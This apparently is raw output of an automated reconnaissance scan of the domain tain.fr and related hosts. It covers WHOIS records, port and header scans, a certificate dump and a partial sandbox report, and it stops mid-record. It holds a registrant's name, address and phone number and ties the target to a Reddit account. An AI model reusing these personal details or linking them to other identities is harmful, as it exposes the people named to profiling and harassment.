%% domain: tain.fr status: ACTIVE eppstatus: active hold: NO holder-c: SC54767-FRNIC admin-c: SC54767-FRNIC tech-c: K6635-FRNIC registrar: KIFCORP Expiry Date: 2023-03-01T08:35:38Z created: 2021-03-01T08:35:38Z last-update: 2022-03-01T08:36:40Z source: FRNIC nserver: ns1.alpesc.net nserver: ns2.alpesc.net source: FRNIC registrar: KIFCORP address: 78 RUE D ALEMBERT address: 38000 GRENOBLE country: FR phone: +33.458000007 e-mail: contact@kifcorp.fr website: https://www.kifdom.com/faq.php anonymous: No registered: 2014-12-22T00:00:00Z source: FRNIC nic-hdl: SC54767-FRNIC type: PERSON contact: Sebastien Chevillet address: 10 Rue de Penthievre address: 75008 Paris country: FR phone: +33.768936738 e-mail: contact@vosdomaines.com registrar: KIFCORP changed: 2022-10-17T08:04:47.27595Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: ok eligsource: REGISTRAR eligdate: 2021-06-25T00:00:00Z reachstatus: ok reachmedia: email reachsource: REGISTRAR reachdate: 2021-06-25T00:00:00Z source: FRNIC nic-hdl: K6635-FRNIC type: ORGANIZATION contact: KIFCORP address: KIFCORP address: 78 rue d'Alembert address: 38000 GRENOBLE country: FR phone: +33.458000007 e-mail: contact@kifcorp.fr registrar: KIFCORP changed: 2022-12-16T10:49:00.573083Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: ok eligsource: REGISTRY eligdate: 2021-08-10T00:00:00Z reachstatus: ok reachmedia: phone reachsource: REGISTRY reachdate: 2021-08-10T00:00:00Z source: FRNIC >>> WHOIS request date: 2022-12-18T00:11:07.695058Z <<< raspu.tain.fr 2022-12-18 00:21:17 Open TCP Port No Censys 0 0 2 0 None 188.114.96.1:8080 188.114.96.1 2022-12-18 00:21:34 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", 
"Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77b0ef6cacfce28b-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 104.21.19.243 2022-12-18 00:09:31 Raw Data from RIRs No LeakIX 0 0 2 0 None {u'Services': [{u'protocol': u'http', u'event_type': u'service', u'ip': u'172.67.169.215', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'172.67.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731fedbc44a39cb147fd61faf139899b93230d079f165aebc0d', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'"Holocaustul, Un Avertisment Al Istoriei" (Prof. 
Mihai Chioveanu)', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u'key_algo': u'', u'not_before': u'0001-01-01T00:00:00Z'}, u'enabled': False, u'detected': False, u'version': u''}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'US', u'city_name': u'', u'location': {u'lat': 37.751, u'lon': -97.822}, u'country_name': u'United States', u'continent_name': u'North America', u'region_name': u''}, u'host': u'persvasscomfe.cf', u'summary': u'Date: Fri, 04 Nov 2022 13:43:30 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nSet-Cookie: ch1c=b\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=hGE4R3XNmrTCzrMsV4spPtkBhiWJx3T3UcuC151O1dDwBX8DahvVgvaHio9pmErRtfYdDc%2BExnYiNqawaxQcwAJoaSOziOyfdQnGFXuBNmOiRuGYsaLpr4sAtPisTCA3W1jU"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 764dc76ed9d2cfa8-SJC\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: "Holocaustul, Un Avertisment Al Istoriei" (Prof. 
Mihai Chioveanu)', u'time': u'2022-11-04T13:43:29.694417328Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'172.67.169.215', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'172.67.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee987319317d86e2d588a2b7f31fc7718ad4491369cb730d3a794a6', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'403 Error', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'aaja.co', u'*.aaja.co', u'sni.cloudflaressl.com'], u'cn': u'sni.cloudflaressl.com', u'valid': True, u'not_after': u'2023-02-17T23:59:59Z', u'key_size': 256, u'issuer_name': u'Cloudflare Inc ECC CA-3', u'fingerprint': u'c82791938f351011459e2059ed1d9149875c4c91b7d49ee13c9ee4c0e3d425e2', u'key_algo': u'ECDSA', u'not_before': u'2022-02-17T00:00:00Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'US', u'city_name': u'', u'location': {u'lat': 37.751, u'lon': -97.822}, u'country_name': u'United States', u'continent_name': u'North America', u'region_name': u''}, u'host': u's.aaja.co', 
u'summary': u'Date: Thu, 03 Nov 2022 12:34:03 GMT\r\nContent-Type: text/html\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nlast-modified: Sun, 19 Jun 2022 19:35:41 GMT\r\nvary: Accept-Encoding\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=j4DNccNYtwdSWQ9slXGg4CUji%2BOsreEoEqhE4cNFZlAHGxTC8Jf8GKUVg3bENrhtiebsgxkK%2BAeSfrMhC4wdbIRxPVa%2BuANSo%2FkMXIpHWrQgwkaImSFrq%2BA%2F%2FcU%3D"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nStrict-Transport-Security: max-age=15552000; includeSubDomains; preload\r\nX-Content-Type-Options: nosniff\r\nServer: cloudflare\r\nCF-RAY: 76452451dd72caad-HAM\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: 403 Error\n\n2dc\r\n\n\n\n \n \n 403 Error\n \n \n \n\n\n\n\n

\n It appears you don\'t have
permission to access this page.\n

\n \n

\n 403 Error. Forbidden.\n

\n \n\n\n\n\r\n0\r\n\r\n', u'time': u'2022-11-03T12:34:01.823420181Z'}, {u'protocol': u'https', u'event_type': u'service', u'ip': u'172.67.169.215', u'vendor': u'', u'port': u'443', u'transport': [u'tcp', u'tls', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'172.67.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731fedbc44a39cb147fd61faf137508286245ff17effeb94e13', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'\u0e2b\u0e19\u0e49\u0e32\u0e41\u0e23\u0e01 - iowstartwelllivewellagewell', u'url': u'', u'header': {u'server': u'cloudflare'}, u'length': 0, u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'TLS_AES_128_GCM_SHA256', u'jarm': u'00000000000000000000000000000000000000000000000000000000000000', u'certificate': {u'domain': [u'*.iowstartwelllivewellagewell.com', u'iowstartwelllivewellagewell.com'], u'cn': u'*.iowstartwelllivewellagewell.com', u'valid': True, u'not_after': u'2023-01-23T04:13:32Z', u'key_size': 256, u'issuer_name': u'E1', u'fingerprint': u'67f9814a4751de3cf7acd0499b6961786bd24f1a2f5f8a087443f3712df54a3d', u'key_algo': u'ECDSA', u'not_before': u'2022-10-25T04:13:33Z'}, u'enabled': True, u'detected': False, u'version': u'TLSv1.3'}, u'mac': u'', u'ssh': {u'motd': u'', u'version': 0, u'banner': u'', u'fingerprint': u''}, u'reverse': u'', u'geoip': {u'region_iso_code': u'', u'country_iso_code': u'US', u'city_name': u'', u'location': {u'lat': 37.751, u'lon': -97.822}, u'country_name': u'United States', 
u'continent_name': u'North America', u'region_name': u''}, u'host': u'iowstartwelllivewellagewell.com', u'summary': u'Date: Thu, 03 Nov 2022 06:00:24 GMT\r\nContent-Type: text/html; charset=UTF-8\r\nTransfer-Encoding: chunked\r\nConnection: close\r\nx-powered-by: PHP/8.0.25\r\nx-powered-by: PleskLin\r\nlast-modified: Wed, 02 Nov 2022 19:31:48 GMT\r\nvary: Accept-Encoding\r\nCF-Cache-Status: DYNAMIC\r\nReport-To: {"endpoints":[{"url":"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5NICZteL%2BtBr5A6IaDqm7mJy9WqFnhsmXDTWVKAWJguvpDi83GwQpr5LcrQaIaGPux2FihwvBdyWw5SN6POfw0vvErhnTUXXcimKp0A9FQno4Tbi6FVF%2F%2F0Xee24%2BBWYIFEhVh5LsML2wfaAZBLRjQTV"}],"group":"cf-nel","max_age":604800}\r\nNEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}\r\nServer: cloudflare\r\nCF-RAY: 7642e3abdb529a39-FRA\r\nalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400\r\n\nPage title: \u0e2b\u0e19\u0e49\u0e32\u0e41\u0e23\u0e01 - iowstartwelllivewellagewell', u'time': u'2022-11-03T06:00:23.077103124Z'}, {u'protocol': u'http', u'event_type': u'service', u'ip': u'172.67.169.215', u'vendor': u'', u'port': u'80', u'transport': [u'tcp', u'http'], u'event_source': u'HttpPlugin', u'network': {u'organization_name': u'CLOUDFLARENET', u'asn': 13335, u'network': u'172.67.0.0/16'}, u'service': {u'credentials': {u'username': u'', u'raw': None, u'password': u'', u'noauth': False, u'key': u''}, u'software': {u'modules': None, u'version': u'', u'os': u'', u'name': u'cloudflare', u'fingerprint': u''}}, u'event_fingerprint': u'6d1f2e7c9ee98731735c0f301524bacadf25fc6856dcb97e498efbb733038dcd', u'leak': {u'dataset': {u'files': 0, u'rows': 0, u'ransom_notes': None, u'infected': False, u'collections': 0, u'size': 0}, u'type': u'', u'severity': u'', u'stage': u''}, u'event_pipeline': [u'CertStream', u'l9scan', u'tcpid', u'HttpPlugin'], u'http': {u'status': 0, u'title': u'', u'url': u'', u'header': {u'location': u'https://iowstartwelllivewellagewell.com/', u'server': u'cloudflare'}, u'length': 0, 
u'favicon_hash': u'', u'root': u''}, u'tags': [], u'ssl': {u'cypher_suite': u'', u'jarm': u'', u'certificate': {u'domain': None, u'cn': u'', u'valid': False, u'not_after': u'0001-01-01T00:00:00Z', u'key_size': 0, u'issuer_name': u'', u'fingerprint': u'', u' 172.67.169.215 2022-12-18 00:32:16 Similar Domain - Whois No Whois 2 0 2 0 None Domain Name: PLAGUE.TECH Registry Domain ID: D183124424-CNIC Registrar WHOIS Server: whois.west.cn Registrar URL: http://www.west.cn Updated Date: 2022-06-14T09:03:38.0Z Creation Date: 2020-04-17T02:15:35.0Z Registry Expiry Date: 2023-04-17T23:59:59.0Z Registrar: CHENGDU WEST DIMENSION DIGITAL TECHNOLOGY CO., LTD. Registrar IANA ID: 1556 Domain Status: ok https://icann.org/epp#ok Registrant Organization: Wei Cao Registrant State/Province: Jiang Su Registrant Country: CN Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Name Server: NS4.MYHOSTADMIN.NET Name Server: NS5.MYHOSTADMIN.NET DNSSEC: unsigned Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. 
Registrar Abuse Contact Email: abuse@west.cn Registrar Abuse Contact Phone: +86.2862778877 URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of WHOIS database: 2022-12-18T00:32:15.0Z <<< For more information on Whois status codes, please visit https://icann.org/epp >>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit https://www.centralnic.com/support/rdap <<< The Whois and RDAP services are provided by CentralNic, and contain information pertaining to Internet domain names registered by our our customers. By using this service you are agreeing (1) not to use any information presented here for any purpose other than determining ownership of domain names, (2) not to store or reproduce this data in any way, (3) not to use any high-volume, automated, electronic processes to obtain data from this service. Abuse of this service is monitored and actions in contravention of these terms will result in being permanently blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com) Access to the Whois and RDAP services is rate limited. For more information, visit https://registrar-console.centralnic.com/pub/whois_guidance. 
Domain Name: plague.tech Registry Domain ID: zd33450047986564 Registrar WHOIS Server: whois.west.cn Registrar URL: www.west.cn Updated Date: 2020-04-17T02:15:35.0Z Creation Date: 2020-04-17T02:15:35.0Z Registrar Registration Expiration Date: 2023-04-17T23:59:59.0Z Registrar: Chengdu west dimension digital technology Co., LTD Registrar IANA ID: 1556 Reseller: Domain Status: ok http://www.icann.org/epp#ok Registry Registrant ID: Not Available From Registry Registrant Name: REDACTED FOR PRIVACY Registrant Organization: REDACTED FOR PRIVACY Registrant Street: REDACTED FOR PRIVACY Registrant City: REDACTED FOR PRIVACY Registrant State/Province: Jiang Su Registrant Postal Code: REDACTED FOR PRIVACY Registrant Country: CN Registrant Phone: REDACTED FOR PRIVACY Registrant Phone Ext: Registrant Fax: REDACTED FOR PRIVACY Registrant Fax Ext: Registrant Email: link at https://www.west.cn/web/whoisform?domain=plague.tech Registry Admin ID: Not Available From Registry Admin Name: REDACTED FOR PRIVACY Admin Organization: REDACTED FOR PRIVACY Admin Street: REDACTED FOR PRIVACY Admin City: REDACTED FOR PRIVACY Admin State/Province: REDACTED FOR PRIVACY Admin Postal Code: REDACTED FOR PRIVACY Admin Country: REDACTED FOR PRIVACY Admin Phone: REDACTED FOR PRIVACY Admin Phone Ext: Admin Fax: REDACTED FOR PRIVACY Admin Fax Ext: Admin Email: link at https://www.west.cn/web/whoisform?domain=plague.tech Registry Tech ID: Not Available From Registry Tech Name: REDACTED FOR PRIVACY Tech Organization: REDACTED FOR PRIVACY Tech Street: REDACTED FOR PRIVACY Tech City: REDACTED FOR PRIVACY Tech State/Province: REDACTED FOR PRIVACY Tech Postal Code: REDACTED FOR PRIVACY Tech Country: REDACTED FOR PRIVACY Tech Phone: REDACTED FOR PRIVACY Tech Phone Ext: Tech Fax: REDACTED FOR PRIVACY Tech Fax Ext: Tech Email: link at https://www.west.cn/web/whoisform?domain=plague.tech Name Server: ns4.myhostadmin.net Name Server: ns5.myhostadmin.net DNSSEC: signedDelegation Registrar Abuse Contact Email: 
westabuse@gmail.com Registrar Abuse Contact Phone: +86.2862778877 URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of WHOIS database: 2022-12-18T00:32:15.0Z <<< For more information on Whois status codes, please visit https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en plague.tech 2022-12-18 00:21:13 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 403 Forbidden Server: cloudflare Date: Content-Type: text/html Content-Length: 151 Connection: keep-alive CF-RAY: 77ae523eff6ee12f-ORD 188.114.97.0 2022-12-18 00:09:35 Co-Hosted Site No HackerTarget 0 0 2 0 None onlimapotexttac.tk 104.21.28.240 2022-12-18 00:08:38 BGP AS Membership No RIPE 0 0 3 0 None 13335 172.67.128.0/20 2022-12-18 00:21:51 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77b265899d032ad2-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 172.67.137.37 2022-12-18 00:21:54 Open TCP Port Banner No Censys 0 0 2 0 None HTTP/1.1 400 Bad Request Server: cloudflare Date: Content-Type: text/html Content-Length: 253 Connection: close CF-RAY: - 104.21.7.179 2022-12-18 00:21:58 BGP AS Membership No Censys 0 0 2 0 None 13335 2a06:98c1:3120::1 2022-12-18 00:16:46 Co-Hosted Site No ThreatMiner 0 0 2 0 None s4bskcnr4ocn.m7yke.repl.co 34.149.204.188 2022-12-18 00:25:39 Affiliate - Internet Name No DNS Resolver 0 0 4 0 None 
lfbn-nic-1-313-184.w90-116.abo.wanadoo.fr 90.116.149.184 2022-12-18 00:04:11 SSL Certificate - Raw Data No SSL Certificate Analyzer 0 0 2 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 09:6b:82:e9:73:99:94:ba:fd:55:b0:21:db:c7:c8:bf Signature Algorithm: ecdsa-with-SHA256 Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 Validity Not Before: Aug 3 00:00:00 2022 GMT Not After : Aug 2 23:59:59 2023 GMT Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:76:16:8f:f9:e3:b6:aa:dc:0b:91:40:d8:f1:ee: e8:7f:8e:97:0e:7d:bd:b0:c5:93:63:66:fa:7b:4f: 17:a1:09:ff:20:68:33:a3:45:37:1f:e8:4b:eb:77: 53:b6:57:60:ef:a1:af:f1:36:97:26:c7:fa:95:e9: 9a:ab:1a:dd:7d ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Authority Key Identifier: keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F X509v3 Subject Key Identifier: 18:B9:52:2C:13:17:3E:3A:39:88:53:5C:BD:9C:BE:05:0B:02:25:90 X509v3 Subject Alternative Name: DNS:cdnjs.cloudflare.com, DNS:*.cdnjs.cloudflare.com, DNS:sni.cloudflaressl.com X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 CRL Distribution Points: Full Name: URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl Full Name: URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl X509v3 Certificate Policies: Policy: 2.23.140.1.2.2 CPS: http://www.digicert.com/CPS Authority Information Access: OCSP - URI:http://ocsp.digicert.com CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt X509v3 Basic Constraints: critical CA:FALSE CT Precertificate SCTs: Signed Certificate Timestamp: Version : v1 (0x0) Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9: 03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E Timestamp : Aug 3 19:12:00.178 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 
30:44:02:20:35:9E:7D:1C:03:B8:4A:87:C0:13:01:D5: 28:AD:64:70:5B:10:FC:72:88:58:48:7A:E3:4C:D5:27: DB:76:00:22:02:20:12:E0:E2:34:44:22:24:C1:E5:7A: 25:12:AD:9E:F8:88:A1:A0:65:AF:1A:76:C9:03:41:4F: 8A:70:C8:E6:BA:DA Signed Certificate Timestamp: Version : v1 (0x0) Log ID : 35:CF:19:1B:BF:B1:6C:57:BF:0F:AD:4C:6D:42:CB:BB: B6:27:20:26:51:EA:3F:E1:2A:EF:A8:03:C3:3B:D6:4C Timestamp : Aug 3 19:12:00.017 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:EE:6E:D3:CF:4A:8A:13:16:AB:6B:C2: F7:32:B6:2A:5B:13:45:7A:44:ED:3B:86:8B:85:F4:94: BA:E0:8C:12:60:02:21:00:8C:46:CA:E7:C6:A7:69:C8: 22:62:61:BA:E1:29:8F:BC:3C:BF:F4:A2:81:44:80:DA: F5:C9:B6:E6:AF:CD:A6:FB Signed Certificate Timestamp: Version : v1 (0x0) Log ID : B3:73:77:07:E1:84:50:F8:63:86:D6:05:A9:DC:11:09: 4A:79:2D:B1:67:0C:0B:87:DC:F0:03:0E:79:36:A5:9A Timestamp : Aug 3 19:12:00.038 2022 GMT Extensions: none Signature : ecdsa-with-SHA256 30:46:02:21:00:E5:0C:F6:4E:3C:40:01:1A:EC:D8:91: 2D:69:6A:1C:FF:4F:75:55:8C:D7:D2:38:86:36:36:FA: EE:4F:65:29:FC:02:21:00:9F:BC:3F:8A:93:C7:A2:ED: F5:94:99:85:01:90:F2:60:36:3B:2E:03:0E:E0:46:5E: 8C:3E:16:39:2B:64:D1:78 Signature Algorithm: ecdsa-with-SHA256 30:45:02:21:00:d8:35:e0:5c:fe:c9:39:b4:06:5a:95:36:1c: 73:f4:85:1c:c5:6e:6b:ef:48:76:d6:7f:a3:fe:55:ed:82:7f: c5:02:20:7f:8c:86:3a:6f:04:3e:0d:d7:cc:87:51:a8:0d:5c: ce:bc:93:88:aa:35:4a:5c:02:bb:47:5c:7c:87:7b:21:de 188.114.96.1 2022-12-18 00:05:57 Account on External Site No Account Finder 0 0 2 0 None Reddit (Category: social) https://www.reddit.com/user/zerotwo-best-waifu zerotwo-best-waifu 2022-12-18 00:02:48 IP Address No Mnemonic PassiveDNS 75 0 1 0 None 188.114.97.1 plague.fun 2022-12-18 00:21:34 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", 
"Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["77ae242be84c2331-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 104.21.19.243 2022-12-18 00:13:38 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None familiar@familiar.com.py [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': None, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.149.204.188:443"\n "209.197.3.8:80"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_cd4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_cd4_IESQMMUTEX_0_519"\n "Local\\ZonesLockedCacheCounterMutex"\n 
"{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_cd4_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_cd4_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3284"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_cd4_IE_EarlyTabStart_0xa88_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_cd4_ConnHashTable<3284>_HashTable_Mutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'String', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /resources/font-awesome/css/font-awesome.min.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: f8a9d265-01cc-44cf-a7f6-04910a6d1dcb.id.repl.co\nDNT: 
